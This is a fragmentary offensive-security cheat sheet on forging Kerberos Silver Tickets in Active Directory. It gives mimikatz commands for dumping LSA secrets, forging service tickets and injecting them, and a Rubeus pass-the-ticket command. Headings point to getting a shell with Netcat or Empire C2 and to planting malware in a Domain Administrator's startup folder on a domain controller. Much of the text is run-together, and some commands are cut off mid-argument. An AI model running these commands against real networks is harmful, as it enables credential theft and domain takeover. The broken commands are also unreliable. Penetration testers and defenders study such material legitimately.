Silver Ticket
SILVER TICKET
Forging a Service Ticket (ST) require machine account password (key) or NT hash of the service account.
mimikatz.exeprivilege::debuglsadump::lsa /inject /name:SERVICE/DOMAIN ADMIN1) Create a ticket for the service
mimikatz $ kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:
mimikatz $ kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129142) Use same steps as a golden ticket
mimikatz.exe "kerberos::golden /domain:DOMAIN /sid:DOMAIN_SID /rc4:HASH /user:USER /service:SERVICE /target:TARGET"Inject the ticket
mimikatz.exe "kerberos::ptt TICKET_FILE"
.\Rubeus.exe ptt /ticket:TICKET_FILEObtain a shell
Silver Ticket on Linux
Services to target with a Silver Ticket
Service Type --> Service Silver Tickets --> Attack
Silver Ticket Example
Requirements: Machine account NTLM hash
1) Mimikatz
2) Rubeus
Forge silver ticket
3) Empire C2
Post Exploitation Techniques Examples
Map drive
Copy malware to Domain Administrator startup folder on DC
CMD
Netcat
Other ticket combinations
Technique
Required Service Ticket
Last updated